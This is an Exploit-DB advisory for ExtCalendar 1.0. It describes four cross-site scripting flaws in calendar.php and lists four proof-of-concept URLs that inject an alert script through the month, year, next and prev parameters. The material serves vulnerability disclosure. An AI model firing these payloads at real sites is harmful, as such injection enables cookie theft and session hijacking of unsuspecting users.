Extcalendar 1.0 - Cross-Site Scripting

EDB-ID:

27443




Platform:

PHP

Date:

2006-03-18


source: https://www.securityfocus.com/bid/17146/info

ExtCalendar is prone to four cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

http://www.example.com/path/calendar.php?op=cal&month=3&year="><script>alert(/Soot/)</script> 

http://www.example.com/path/calendar.php?op=cal&month="><script>alert(/Soot/)</script>&year=2006 

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next="><script>alert(/Soot/)</script> 

http://www.example.com/path/calendar.php?op=day&ask=nd&da=28&mo=3&ye=2006&next=2&prev="><script>alert(/Soot/)</script>